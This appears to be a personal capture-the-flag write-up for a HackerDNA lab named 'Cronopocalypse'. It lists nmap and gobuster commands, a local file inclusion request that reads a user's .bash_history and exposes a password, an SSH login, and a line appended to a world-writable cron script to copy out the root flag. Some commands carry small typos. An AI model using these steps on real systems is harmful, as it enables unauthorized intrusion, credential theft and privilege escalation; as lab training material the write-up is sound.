Cronopocalypse
Date: 5/29/26
Flags: 2 total
Link: Cronpocalypse | flags | HackerDNA
-
- Browsed to IP site and found website with potential Local File Inclusion (LFI) vulnerability
-
- Ran NMAP scan against target
- Command: Nmap -sv 34.241.22.194
- Results:

-
- Ran GoBuster to enumerate hidden directories on web page
- Command Ran:
gobuster dir -u http://34.245.226.103 -w ~/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
-
- LFI - http://http://34.245.226.103/read?file=flag.txt
- LFI Available
-
- Curl Request
- curl "http://34.245.226.103/read?file=flag-user.txt"
- Access Denied!
-
- Accessing bash_history
- curl http://34.245.226.103/read?file=/home/ctf/.bash_history

- User: ctf
- PW: Sup3rStr0ngP@ssw0rd!
-
- SSH into system using credentialls
-
- Once in system search for flag, cat file, and enter into HDNA site
-
- Browse to /etc/crontabs and read files
-
- Found /tmp/backup.sh
-
- Find permissions and everyone has read and write
-
- Contents of script
#!/bin/sh
tar -czf /tmp/backup.tar.gz /tmp/*.log
-
- Modify backup.sh to get root flag
- ``echo "cp /root/flag-root.txt /tmp/flag.txt && chmod 644 /tmp/flag.txt" >> /tmp/backup.sh `